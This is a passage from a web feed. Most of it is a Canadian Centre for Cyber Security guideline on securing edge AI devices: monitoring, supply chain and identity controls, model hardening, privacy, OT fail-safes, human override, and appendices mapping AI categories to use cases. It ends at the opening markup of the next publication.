href="#2.1">Pillar 1: Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></a></li> <li><a href="#2.2">Pillar 2: Protecting <abbr title="artificial intelligence">AI</abbr> systems</a></li> <li><a href="#2.3">Pillar 3: Protecting users and business processes</a></li> </ul></li> <li><a href="#3">The “1 device” exercise — Applying this guidance</a></li> <li><a href="#4">Summary</a></li> <li><a href="#5">Learn more</a></li> <li><a href="#AA">Appendix A: Key edge <abbr title="artificial intelligence">AI</abbr> categories</a></li> <li><a href="#AB">Appendix B: Edge <abbr title="artificial intelligence">AI</abbr> use cases (user and operator categories)</a></li> </ul></details></section><section><h2 id="1">Edge <abbr title="artificial intelligence">AI</abbr>  </h2> <p>Edge <abbr title="artificial intelligence">AI</abbr> refers to <abbr title="artificial intelligence">AI</abbr> that performs inference and decision-making on or near the device where data is generated, such as:</p> <ul><li>smartphones with on-device assistants</li> <li>industrial gateways and controllers</li> <li>autonomous vehicles and drones</li> <li>smart sensors</li> <li>medical diagnostic devices</li> </ul><p>AI models are usually trained centrally, in the cloud or on premises, and then deployed to the network edge.</p> <p>In practice, edge <abbr title="artificial intelligence">AI</abbr> is often hybrid. Devices process data locally but rely on the cloud for model updates, orchestration, telemetry or fallback support. Edge <abbr title="artificial intelligence">AI</abbr> is defined more by local inference and decision-making than by total independence from the cloud. Organizations adopt edge <abbr title="artificial intelligence">AI</abbr> because of its low latency, reduced bandwidth use, and stronger data residency. It is also resilient in the event of connectivity loss and offers mission-critical autonomy as well as potentially lower costs. However, privacy is not guaranteed with edge <abbr title="artificial intelligence">AI</abbr>, and the total cost of ownership can include the cost of shifting to device hardware, energy, and fleet lifecycle management.</p> <p>Edge <abbr title="artificial intelligence">AI</abbr> creates distinct security and safety challenges, which may include:</p> <ul><li>local processing can expose models and data to attackers</li> <li>offline operation can delay patching and oversight</li> <li>data may be less private</li> <li>autonomous systems may act faster than humans can intervene</li> </ul><p>These combined challenges can produce a materially different risk profile from cloud <abbr title="artificial intelligence">AI</abbr>, especially where devices operate in untrusted environments or controlled physical systems.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="2">Cyber security guidelines for edge <abbr title="artificial intelligence">AI</abbr></h2> <p>The guidelines below represent a practical baseline for organizations deploying edge <abbr title="artificial intelligence">AI</abbr>. Organizations may require additional technical, procedural and assurance controls, especially for sensitive or mission-critical systems. You should apply supplementary controls wherever the consequences of compromise, malfunction or misuse are severe.</p> <p>These guidelines are organized into pillars, consistent with <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">ITSAP.10.049</a>:</p> <ul><li><strong>Pillar 1: Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></strong> addresses how adversaries can exploit <abbr title="artificial intelligence">AI</abbr> systems and how organizations can use detection and monitoring to respond</li> <li><strong>Pillar 2: Protecting <abbr title="artificial intelligence">AI</abbr> systems</strong> focuses on securing models, software pipelines, devices, identities and supply chains</li> <li><strong>Pillar 3: Protecting users and business processes</strong> addresses safety, privacy, resilience and human oversight</li> </ul><h3 id="2.1">Pillar 1: Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></h3> <p>This pillar addresses the reality that adversaries can use <abbr title="artificial intelligence">AI</abbr> to conduct faster, more adaptive and more frequent attacks. Edge <abbr title="artificial intelligence">AI</abbr> devices are especially exposed because they often operate in public or uncontrolled environments and may be difficult to patch or supervise continuously. Organizations should emphasize rapid detection, behavioural monitoring and adaptive protection at the device and fleet level.</p> <h4>Behaviour-based detection and protection of edge devices</h4> <p><strong>Objective:</strong> Detect and disrupt abnormal or malicious behaviour affecting edge devices, including attacks that adapt over time or use <abbr title="artificial intelligence">AI</abbr> to evade static controls.</p> <p>Deploy security controls that can identify suspicious behaviour rather than relying only on fixed signatures or static rules. Monitor device processes, network activity, command sequences, sensor outputs and usage patterns for signs of deviation from normal operation. Where feasible, use device- or fleet-level baselines so unusual behaviour can be flagged quickly even when a specific attack is not yet known.</p> <p>Prioritize protections that can respond dynamically, such as policy-based isolation, automated containment, rate limiting or failsafe mode activation when defined thresholds are exceeded. In environments with intermittent connectivity, ensure local protections can still function when cloud-based security services are unavailable. Review detections regularly to refine thresholds, reduce noise and adapt to changing device roles and operating conditions.</p> <p>Small and medium-sized organizations should:</p> <ul><li>enable built-in endpoint detection and response (EDR) or antivirus (for example, Microsoft 365 Defender)</li> <li>use simple network anomaly tools or a firewall’s intrusion prevention system to flag unusual device traffic</li> <li>start with basic rules (like new outbound connections and central processing unit (CPU) spikes) and auto-quarantine when these are triggered.</li> </ul><p><abbr title="information technology">IT</abbr> security practitioners should:</p> <ul><li>build per-device-class baselines in your security information and event management (SIEM)</li> <li>deploy <abbr title="endpoint detection and response">EDR</abbr> where supported</li> <li>use <abbr title="operational technology">OT</abbr> and Internet of Things (IoT) network intrusion detection for industrial equipment</li> <li>write detection rules for output distribution shifts, unusual protocol uses and sudden inference-rate changes</li> </ul><h4>Continuous monitoring and anomaly detection</h4> <p><strong>Objective:</strong> Gain visibility into edge <abbr title="artificial intelligence">AI</abbr> behaviour and detect security or safety issues early.</p> <p>Deploy monitoring capabilities on edge devices to capture both traditional security telemetry and <abbr title="artificial intelligence">AI</abbr>-specific signals. At a minimum, collect authentication events, resource usage, connectivity anomalies and errors. You should also collect model-related metrics such as inference counts, confidence levels, latency, decision logs or autonomous actions taken. Ensure the data can be transmitted securely, including store-and-forward mechanisms for intermittent connectivity.</p> <p>Define alert thresholds so serious events, such as failed integrity checks or dangerous deviations in behaviour, trigger immediate action. Lower-grade anomalies can then be reviewed without creating alert fatigue. Monitor for performance shifts, drift, unusual outputs or changing input patterns that may indicate sensor faults, adversarial interference or model degradation. Prepare <abbr title="artificial intelligence">AI</abbr>-specific incident response playbooks so responsible teams know how to isolate, investigate and safely recover affected systems.</p> <p>Small and medium-sized organizations should:</p> <ul><li>use a managed <abbr title="security information and event management">SIEM</abbr> or built-in cloud monitoring (such as Microsoft 365 Defender, Azure Sentinel or Elastic Cloud)</li> <li>collect system logs, application logs and basic health metrics</li> <li>set alerts for version or digital fingerprint (hash) changes as well as error spikes</li> </ul><p><abbr title="information technology">IT</abbr> security practitioners should:</p> <ul><li>define a telemetry schema (device posture, firmware and model hashes, attestation results, sensor health and inference statistics)</li> <li>sign and buffer logs and push to a <abbr title="security information and event management">SIEM</abbr></li> <li>build dashboards and anomaly rules for drift, tampering, and connectivity gaps</li> </ul><h3 id="2.2">Pillar 2: Protecting <abbr title="artificial intelligence">AI</abbr> systems</h3> <p>This pillar focuses on securing the <abbr title="artificial intelligence">AI</abbr> components, devices, software and supporting infrastructure that make edge <abbr title="artificial intelligence">AI</abbr> possible. Because <abbr title="artificial intelligence">AI</abbr> is often embedded in distributed devices, organizations need strong visibility, supply chain controls, integrity protections and identity governance to prevent compromise.</p> <h4>Identify and classify your edge <abbr title="artificial intelligence">AI</abbr> assets</h4> <p><strong>Objective:</strong> Know what edge <abbr title="artificial intelligence">AI</abbr> systems you have, where they run and the impact if they fail or are compromised.</p> <p>Conduct a comprehensive discovery exercise to identify all edge systems using any form of <abbr title="artificial intelligence">AI</abbr>, including rule-based automation, machine learning (ML), computer vision, sensor fusion or embedded <abbr title="artificial intelligence">AI</abbr> features, that may not be immediately apparent. For each edge system, document what it does, what could happen if it fails, whether it affects physical processes and whether fallback or manual control exists.</p> <p>Classify systems into clear risk tiers (safety-critical, business-critical or operational) so you can prioritize security efforts. Record architectural details and dependencies, including whether systems are fully local, hybrid edge-cloud, gateway-based or federated. Maintain this as a living inventory and connect it to change management so new <abbr title="artificial intelligence">AI</abbr> capabilities trigger review. This foundational step underpins every other security measure in this guidance.</p> <h4>Secure your <abbr title="artificial intelligence">AI</abbr> supply chain and maintain a dynamic bill of materials</h4> <p><strong>Objective:</strong> Know the origin and integrity of every component in your edge <abbr title="artificial intelligence">AI</abbr> stack and be ready to replace or update them quickly.</p> <p>Expand your inventory to include:</p> <ul><li>hardware</li> <li>firmware</li> <li>operating systems</li> <li><abbr title="artificial intelligence">AI</abbr> models</li> <li>libraries</li> <li>dependencies</li> <li>plug-ins</li> <li>datasets</li> <li>configuration files</li> </ul><p>Generate and maintain software bills of materials (SBOMs) and, where possible, model bills of materials (MBOMs) that capture provenance and versioning for <abbr title="artificial intelligence">AI</abbr> components. Update <abbr title="software bills of materials">SBOMs</abbr> and <abbr title="model bills of materials">MBOMs</abbr> whenever systems change.</p> <p>Vet third-party software, frameworks and pre-trained models before deploying them. This includes conducting vulnerability checks, supplier reviews and integrity validation through hashes or signatures. Monitor component vulnerabilities continuously and be prepared to patch, replace, disable or quarantine affected elements rapidly. Enforce that only approved and signed software and models can run on edge devices.</p> <h4>Govern non-human identities</h4> <p><strong>Objective:</strong> Manage credentials and identities used by <abbr title="artificial intelligence">AI</abbr> systems with the same rigour applied to human users.</p> <p>Audit all <abbr title="artificial intelligence">AI</abbr> agents, service accounts, bots, scripts and automated processes to determine how they authenticate and what they can access. Eliminate risky patterns such as shared human accounts, static credentials embedded in code or firmware and orphaned machine accounts that remain active after decommissioning.</p> <p>Assign every <abbr title="artificial intelligence">AI</abbr> system a unique identity, issue short-lived credentials where possible and automate rotation and revocation. Apply least privilege so <abbr title="artificial intelligence">AI</abbr> agents can access only the systems, data or commands they genuinely require. In higher-assurance environments, tie identity issuance to device or workload attestation so credentials are granted only when the system is in a trusted state.</p> <h4>Secure model disposal and apply cryptographic erasure</h4> <p><strong>Objective:</strong> Ensure retired edge <abbr title="artificial intelligence">AI</abbr> devices and models cannot be mined for data, credentials or intellectual property.</p> <p>Establish a formal decommissioning process for edge <abbr title="artificial intelligence">AI</abbr> devices that includes secure wiping, verification, documentation and credential revocation. Where supported, use hardware-based cryptographic erasure by destroying or invalidating encryption keys so stored data and models become unreadable. In highly sensitive cases, physically destroy storage media.</p> <p>Require secure storage and disposal capabilities during procurement so future devices support encryption and reliable key destruction. Also account for lost or stolen devices by enabling rapid remote wipe and immediate revocation of access. This extends security across the full lifecycle of the asset.</p> <h4>Harden <abbr title="artificial intelligence">AI</abbr> models, agents and control logic against theft and tampering</h4> <p><strong>Objective:</strong> Protect <abbr title="artificial intelligence">AI</abbr> models and related control components on edge devices from theft, tampering and manipulation.</p> <p>Use hardware-supported protections such as Secure Boot, full-disk encryption and trusted execution environments where available. Treat models, policies, configuration files and agent logic as critical software by signing them digitally and verifying signatures before loading. Where feasible, bind model or configuration encryption to individual devices so copied files cannot be reused elsewhere.</p> <p>Continuously verify integrity and monitor for unusual performance changes that may indicate tampering, unauthorized modification or adversarial manipulation. Protect rules, prompts, configuration files and models from unauthorized change through logging, write protection, checksums or digital signatures. Regularly test scenarios such as spoofed sensor data, malicious configuration changes or deceptive inputs to confirm that safeguards, fail-safes and alerts work as intended.</p> <h3 id="2.3">Pillar 3: Protecting users and business processes</h3> <p>This pillar addresses privacy, safety, reliability and governance. It recognizes that <abbr title="artificial intelligence">AI</abbr> can fail through drift, error, misuse or over-automation even when no malicious attack is involved. It emphasizes resilient processes and human control.</p> <h4>Implement data privacy and on-device processing controls</h4> <p><strong>Objective:</strong> Reduce unnecessary exposure of sensitive data and maintain control over how personal or sensitive information is processed.</p> <p>Map the dataflows of each edge <abbr title="artificial intelligence">AI</abbr> system, including:</p> <ul><li>what data is collected</li> <li>where data is stored</li> <li>whether personal or sensitive information is involved</li> <li>whether personal or sensitive information is transmitted to external servers or vendor platforms</li> </ul><p>Many devices ship with default cloud services enabled, so hidden data transfers must be identified and assessed.</p> <p>Prioritize local or on-premises processing for sensitive data using compact models or small language models where feasible. When external processing is required, route data only to approved environments that meet privacy, security and jurisdictional requirements. Monitor outbound traffic for unexpected destinations, encrypt data in transit and minimize exposure through anonymization, aggregation or data minimization where possible.</p> <h4>Secure the operational and information technology boundary and implement fail-safes</h4> <p><strong>Objective:</strong> Ensure that when <abbr title="artificial intelligence">AI</abbr> is integrated with <abbr title="operational technology">OT</abbr>, safety and reliability do not depend solely on <abbr title="artificial intelligence">AI</abbr>.</p> <p>Identify every point where edge <abbr title="artificial intelligence">AI</abbr> interacts with physical equipment or industrial control processes. For each interaction point, determine the worst-case outcome if the <abbr title="artificial intelligence">AI</abbr> fails or behaves unexpectedly, and confirm whether a safe fallback exists that does not rely on the <abbr title="artificial intelligence">AI</abbr> itself. Where gaps exist, add independent hardware or low-level safety controls such as emergency stops, spring-return valves or other default-safe mechanisms.</p> <p>Test <abbr title="artificial intelligence">AI</abbr> behaviour in simulated or controlled environments before live deployment, including under abnormal or adversarial conditions. Segment networks between <abbr title="artificial intelligence">AI</abbr> and <abbr title="operational technology">OT</abbr> systems, tightly limit communications and monitor for unauthorized or anomalous commands. Apply restraint and use <abbr title="artificial intelligence">AI</abbr> in <abbr title="operational technology">OT</abbr> only where it provides clear value that justifies the added complexity and risk.</p> <h4>Maintain human oversight and mechanical fail-safes</h4> <p><strong>Objective:</strong> Ensure humans can intervene, override or shut down autonomous edge <abbr title="artificial intelligence">AI</abbr> systems when necessary.</p> <p>Implement accessible kill switches, override controls or independent shutdown mechanisms for every autonomous or safety-relevant edge <abbr title="artificial intelligence">AI</abbr> system. These controls should not rely on the <abbr title="artificial intelligence">AI</abbr>’s cooperation and should be tested regularly. Define where human approval is required before <abbr title="artificial intelligence">AI</abbr>-initiated actions occur, especially for high-impact decisions.</p> <p>Train operators to understand <abbr title="artificial intelligence">AI</abbr> capabilities and limitations, including how to detect unreliable output, interpret alerts and assume manual control. Manage degrees of autonomy deliberately, assigning each system the appropriate level of independence for its risk profile. Maintain tamper-resistant logs of <abbr title="artificial intelligence">AI</abbr> actions and human interventions so incidents and near-misses can be reviewed and used to improve both technology and process.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="3">The “1 device” exercise — Applying this guidance</h2> <p>After reviewing these guidelines, apply them to one real edge <abbr title="artificial intelligence">AI</abbr> device in your environment. Choose a representative or high-impact system and answer the following four questions:</p> <ol><li>What decisions does the device make autonomously?</li> <li>What inputs influence those decisions?</li> <li>What happens if the device fails or is compromised?</li> <li>What fallback exists if the <abbr title="artificial intelligence">AI</abbr> stops working or can no longer be trusted?</li> </ol><p>Document the findings and use them to prioritize action. If you discover weak or unvalidated inputs, strengthen detection, integrity controls and monitoring. If consequences are severe and fallback is weak, prioritize safety mechanisms, segmentation and human override. For sensitive, safety-critical or mission-critical systems, use this exercise to identify additional controls beyond those outlined in this publication to close residual gaps.</p> </section><section><h2 id="4">Summary</h2> <p>Edge <abbr title="artificial intelligence">AI</abbr> offers significant operational benefits, but it also places more responsibility on the deploying organization for security, safety and resilience. By applying these edge <abbr title="artificial intelligence">AI</abbr> cyber security guidelines, organizations can better defend against <abbr title="artificial intelligence">AI</abbr>-enabled threats, secure their <abbr title="artificial intelligence">AI</abbr> systems and supply chains, as well as preserve privacy, human oversight and operational continuity.</p> <p>Under Pillar 1, organizations should improve visibility, dynamic detection and anomaly response to keep pace with increasingly adaptive attacks. Under Pillar 2, they should manage <abbr title="artificial intelligence">AI</abbr> devices, models, components, identities and control logic as critical assets. Under Pillar 3, they should ensure that <abbr title="artificial intelligence">AI</abbr> adoption does not erode privacy, safety, trust or human control. When implemented together, these guidelines can help organizations take a principled and adaptable approach to securing edge <abbr title="artificial intelligence">AI</abbr> as technologies and threats continue to evolve.</p> </section><section><h2 id="5">Learn more</h2> <ul><li><a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">Top 10 artificial intelligence security actions: A primer (ITSAP.10.049)</a></li> <li><a href="/en/guidance/security-considerations-edge-devices-itsm80101">Security considerations for edge devices (ITSM.80.101)</a></li> <li><a href="/en/guidance/firewall-security-considerations-itsap80039">Firewall security considerations (ITSAP.80.039)</a></li> <li><a href="/en/guidance/routers-cyber-security-best-practices-itsap80019">Router cyber security best practices (ITSAP.80.019)</a></li> <li><a href="/en/guidance/network-security-logging-monitoring-itsap80085">Network security logging and monitoring (ITSAP.80.085)</a></li> <li><a href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a></li> <li>Cybersecurity and Infrastructure Agency (CISA) <a href="https://www.cisa.gov/resources-tools/resources/principles-secure-integration-artificial-intelligence-operational-technology">Principles for the Secure Integration of Artificial Intelligence in Operational Technology</a></li> <li>Open Worldwide Application Security Project (OWASP) <a href="https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/">Top 10 for Agentic Applications 2026</a></li> <li>United Kingdom’s National Cyber Security Centre (NCSC) <a href="https://www.ncsc.gov.uk/files/Guidelines-for-secure-AI-system-development.pdf">Guidelines for secure <abbr title="artificial intelligence">AI</abbr> system development (PDF)</a></li> <li>Cloud Security Alliance (CSA) <a href="https://cloudsecurityalliance.org/artifacts/securing-autonomous-ai-agents/">Securing Autonomous <abbr title="artificial intelligence">AI</abbr> Agents</a></li> <li>United Kingdom’s <a href="https://www.gov.uk/government/publications/ai-cyber-security-code-of-practice">AI Cyber Security Code of Practice</a></li> <li>United States’ National Institute of Standards and Technology (NIST) <a href="https://www.nist.gov/itl/ai-risk-management-framework">AI Risk Management Framework (AI RMF)</a></li> <li>International Organization for Standardization / International Electrotechnical Commission (ISO/IEC) <a href="https://www.iso.org/standard/42001">Standard 42001: Information technology — Artificial intelligence — Management system</a></li> </ul></section><section><h2>Effective date</h2> <p>This publication takes effect on July 15, 2026.</p> <p>This is an <span class="text-uppercase">UNCLASSIFIED</span> publication that has been issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre).</p> <p>For more information, contact the Cyber Centre:</p> <ul><li>by email: <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li>by phone: <a href="tel:+16139497048">613-949-7048</a> or <a href="tel:+18332923788">1‑833‑CYBER‑88</a></li> </ul></section><section><h2>Revision history</h2> <ol class="list-unstyled"><li><strong>First release:</strong> July 15, 2026.</li> </ol></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="AA">Appendix A: Key edge <abbr title="artificial intelligence">AI</abbr> categories</h2> <p>The spectrum of <abbr title="artificial intelligence">AI</abbr> technologies commonly deployed at the network edge can be vast.</p> <p>To effectively secure edge <abbr title="artificial intelligence">AI</abbr>, it is important to recognize the different types, or categories, of <abbr title="artificial intelligence">AI</abbr> and <abbr title="machine learning">ML</abbr> techniques that may be running on your devices, since each has distinct vulnerabilities. Below is a summary of eight major <abbr title="artificial intelligence">AI</abbr> categories found in edge deployments. These categories are not mutually exclusive; an edge device may use multiple <abbr title="artificial intelligence">AI</abbr> types simultaneously.</p> <ul><li><strong>Category A – Rule-based systems:</strong> <ul><li>Description: these use human-defined if/then rules or logic (for example, simple expert systems, safety interlocks)</li> <li>Vulnerability: attackers may tamper with the rules or thresholds themselves. Even without <abbr title="machine learning">ML</abbr>, manipulated rules can cause harmful outcomes if thresholds are altered (for example, changing a safety-alarm trigger from 150 pounds per square inch (PSI) to 500 PSI)</li> </ul></li> <li><strong>Category B – Search, planning and optimization:</strong> <ul><li>Description: algorithms that systematically explore possible solutions or paths (for example, route planning or scheduling)</li> <li>Vulnerability: input manipulation can mislead the planning process. For example, feeding incorrect map data to a pathfinding <abbr title="artificial intelligence">AI</abbr> could send a robot or vehicle along an unsafe route</li> </ul></li> <li><strong>Category C – Probabilistic reasoning:</strong> <ul><li>Description: <abbr title="artificial intelligence">AI</abbr> that fuses data from multiple uncertain sources (for example, Bayesian or Kalman filters)</li> <li>Vulnerability: subtle biasing of inputs can gradually skew estimates without triggering obvious alarms</li> </ul></li> <li><strong>Category D – Classic <abbr title="machine learning">ML</abbr>:</strong> <ul><li>Description: traditional <abbr title="machine learning">ML</abbr> models (for example, decision trees, random forests or support vector machines)</li> <li>Vulnerability: model files and data pipelines must be treated as critical software assets; an attacker might steal or alter an <abbr title="machine learning">ML</abbr> model on a device or manipulate how it processes data</li> </ul></li> <li><strong>Category E – Computer vision pipelines:</strong> <ul><li>Description: systems that interpret images or video</li> <li>Vulnerability: physical adversarial attacks, such as placing patterns in a camera’s view, can mislead the vision system without any digital compromise of the device</li> </ul></li> <li><strong>Category F – Deep learning (non-generative):</strong> <ul><li>Description: deep neural networks used for prediction, classification or detection (for example, voice recognition, advanced driver-assistance systems)</li> <li>Vulnerability: susceptible to adversarial examples and exploitation of software or hardware vulnerabilities in the <abbr title="machine learning">ML</abbr> framework</li> </ul></li> <li><strong>Category G – Generative <abbr title="artificial intelligence">AI</abbr> and small language models (SLMs):</strong> <ul><li>Description: <abbr title="artificial intelligence">AI</abbr> that creates new content or interprets complex commands, which is now feasible on the edge with <abbr title="small language models">SLMs</abbr></li> <li>Vulnerability: introduces unique threats such as prompt injection and output manipulation. In addition, malicious inputs could subvert instructions or cause generated outputs to trigger harmful downstream actions</li> </ul></li> <li><strong>Category H – Reinforcement learning and autonomy (agentic systems):</strong> <ul><li>Description: <abbr title="artificial intelligence">AI</abbr> agents that perceive, decide and act in a loop (for example, robotics, drones or autonomous vehicles)</li> <li>Vulnerability: faces the broadest range of risks, combining physical tampering, adversarial inputs and model compromise with direct and immediate real-world consequences</li> </ul></li> </ul></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="AB">Appendix B: Edge <abbr title="artificial intelligence">AI</abbr> use cases (user and operator categories)</h2> <p>The following are representative categories of organizations or contexts that deploy edge <abbr title="artificial intelligence">AI</abbr>, with example use cases:</p> <ul><li><strong>Category 1 – Critical infrastructure operators:</strong> <ul><li>Description: large-scale essential services and utilities</li> <li>Examples: power grids, telecommunications networks, energy pipelines, nuclear facilities, transportation systems, as well as banking and financial transaction networks</li> <li>Mapping example: A power grid operator (Category 1) using <abbr title="artificial intelligence">AI</abbr> to predict equipment failures and optimize load distribution (Category C – Probabilistic reasoning) will therefore prioritize continuous anomaly monitoring, supply chain integrity of <abbr title="artificial intelligence">AI</abbr> sensors, and robust failsafes to prevent cascading outages</li> </ul></li> <li><strong>Category 2 – Healthcare and medical devices:</strong> <ul><li>Description: health sector entities deploying <abbr title="artificial intelligence">AI</abbr> at points of care</li> <li>Examples: hospitals using diagnostic <abbr title="artificial intelligence">AI</abbr> devices, medical device manufacturers with smart monitoring implants, and health agencies using <abbr title="artificial intelligence">AI</abbr> for bedside patient data analysis</li> <li>Mapping example: A healthcare operator (Category 2) using <abbr title="artificial intelligence">AI</abbr> to help diagnose X-ray images (Category E – Computer vision pipelines) will therefore prioritize data sovereignty and model monitoring for patient safety, as well as adversarial input controls to prevent misdiagnosis from manipulated imaging data</li> </ul></li> <li><strong>Category 3 – Industrial and manufacturing (industrial IoT):</strong> <ul><li>Description: industrial companies using <abbr title="artificial intelligence">AI</abbr> in <abbr title="operational technology">OT</abbr> environments</li> <li>Examples: factories with <abbr title="artificial intelligence">AI</abbr>-driven predictive maintenance sensors, robotic assembly lines, <abbr title="artificial intelligence">AI</abbr>-based quality inspection systems, as well as industrial control systems with embedded <abbr title="machine learning">ML</abbr></li> <li>Mapping example: A manufacturer (Category 3) deploying <abbr title="artificial intelligence">AI</abbr>-driven robotic assembly controlled by reinforcement learning agents (Category H – Reinforcement learning and autonomy) will therefore prioritize physical failsafes, human override mechanisms and hardening of on-device models against tampering</li> </ul></li> <li><strong>Category 4 – Smart cities and municipal services:</strong> <ul><li>Description: public sector and urban infrastructure operators</li> <li>Examples: city traffic control systems with <abbr title="artificial intelligence">AI</abbr>-timed lights, environmental monitoring sensors with local analytics, public safety surveillance cameras with <abbr title="artificial intelligence">AI</abbr>, and smart grid components in municipal utilities</li> <li>Mapping example: A municipal operator (Category 4) using <abbr title="artificial intelligence">AI</abbr> to optimize traffic light sequencing (Category B – Search, planning and optimization) will therefore prioritize integrity verification of input data feeds, transparency in automated decision logic, and human override capabilities</li> </ul></li> <li><strong>Category 5 – Consumer and small business:</strong> <ul><li>Description: individuals and small firms using consumer-grade or small-scale edge <abbr title="artificial intelligence">AI</abbr></li> <li>Examples: smart home devices (like security cameras, voice assistants or smart appliances), wearable health trackers, small business security systems, and smartphones with on-device <abbr title="artificial intelligence">AI</abbr> features</li> <li>Mapping example: A small business (Category 5) using an <abbr title="artificial intelligence">AI</abbr>-enabled smart security camera system (Category E – Computer vision pipelines) will therefore prioritize vendor management for embedded <abbr title="artificial intelligence">AI</abbr> components, data sovereignty to limit unnecessary cloud transmission, and privacy controls for individuals captured on camera</li> </ul></li> <li><strong>Category 6 – Automotive and transportation:</strong> <ul><li>Description: use of edge <abbr title="artificial intelligence">AI</abbr> in vehicles and transport systems</li> <li>Examples: autonomous and semi-autonomous cars, advanced driver-assistance systems, <abbr title="artificial intelligence">AI</abbr> in fleet management devices, delivery drones or unmanned aerial vehicles, and vehicle-to-everything communication systems</li> <li>Mapping example: An automotive manufacturer (Category 6) deploying deep learning for advanced driver-assistance systems (Category F – Deep learning (non-generative)) will therefore prioritize adversarial robustness of perception models, cryptographic protection of over-the-air model updates, and failsafe mechanisms that default control to the human driver</li> </ul></li> <li><strong>Category 7 – Retail and physical security:</strong> <ul><li>Description: retail industry and security service providers leveraging edge <abbr title="artificial intelligence">AI</abbr></li> <li>Examples: <abbr title="artificial intelligence">AI</abbr>-powered closed-circuit television and video analytics, facial recognition access control, smart point-of-sale (POS) kiosks, and autonomous inventory management robots</li> <li>Mapping example: A retail operator (Category 7) using <abbr title="artificial intelligence">AI</abbr>-powered facial recognition for access control (Category E – Computer vision pipelines) will therefore prioritize data privacy compliance, secure model disposal to protect biometric data, and continuous monitoring for model drift or spoofing attempts</li> </ul></li> <li><strong>Category 8 – Agriculture technology:</strong> <ul><li>Description: farming and agricultural businesses deploying <abbr title="artificial intelligence">AI</abbr> on equipment</li> <li>Examples: Autonomous tractors and farm machinery, drones for crop monitoring and pesticide application, as well as edge sensors for soil monitoring and livestock tracking</li> <li>Mapping example: An agricultural operator (Category 8) using <abbr title="artificial intelligence">AI</abbr>-guided autonomous drones for crop monitoring (Category H – Reinforcement learning and autonomy) will therefore prioritize secure supply chain verification of drone firmware, device hardening against physical tampering in remote environments, and defined human override procedures</li> </ul></li> <li><strong>Category 9 – Defence and national security:</strong> <ul><li>Description: government defence, military and security organizations using edge <abbr title="artificial intelligence">AI</abbr> in the field</li> <li>Examples: tactical drones and surveillance robots, <abbr title="artificial intelligence">AI</abbr>-enabled communication equipment for troops, autonomous reconnaissance systems, and edge devices in secure military networks</li> <li>Mapping example: A defence organization (Category 9) deploying <abbr title="artificial intelligence">AI</abbr> for real-time tactical surveillance and autonomous decision support (Categories F and H – Deep learning and Reinforcement learning) will therefore prioritize cryptographic protection of on-device models, zero-trust identity management for autonomous agents, and anti-tamper controls on field-deployed devices</li> </ul></li> <li><strong>Category 10 – Financial services (edge computing):</strong> <ul><li>Description: financial sector use of <abbr title="artificial intelligence">AI</abbr> at edge locations</li> <li>Examples: fraud detection algorithms running on automated teller machines or <abbr title="point of sale">POS</abbr> terminals, biometric authentication devices at bank branches, high-frequency trading systems at exchange edges, and edge analytics for real-time transaction processing</li> <li>Mapping example: A financial institution (Category 10) using <abbr title="artificial intelligence">AI</abbr> for real-time fraud detection at <abbr title="point of sale">POS</abbr> terminals (Category D – Classic <abbr title="machine learning">ML</abbr>) will therefore prioritize model integrity monitoring, secure update pipelines, and anomaly detection to identify when the fraud model’s behaviour has been manipulated</li> </ul></li> </ul><p>Identifying your organization’s category (or combination of categories) will help you tailor these guidelines to your specific context. For instance, a healthcare operator may prioritize data sovereignty and model monitoring for patient safety, whereas a defence organization would heavily emphasize model hardening and human oversight of autonomous systems. You can use these categories as a starting point to focus your efforts where they matter most.</p> </section></div> </div> </div> </div> </div> </article>

  • Guidance on securely configuring authorization and authentication frameworks – ITSP.40.063
    by Canadian Centre for Cyber Security on July 13, 2026 at 6:57 pm

    <article data-history-node-id="7899" about="/en/guidance/guidance-securely-configuring-authorization-authentication-frameworks-itsp40063" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 col-sm-12 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>July 2026</strong></p> </div> <div class="col-md-4 col-sm-12 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 col-sm-12 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.40.063</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>July 2026 | Practitioner series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"><!– <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p 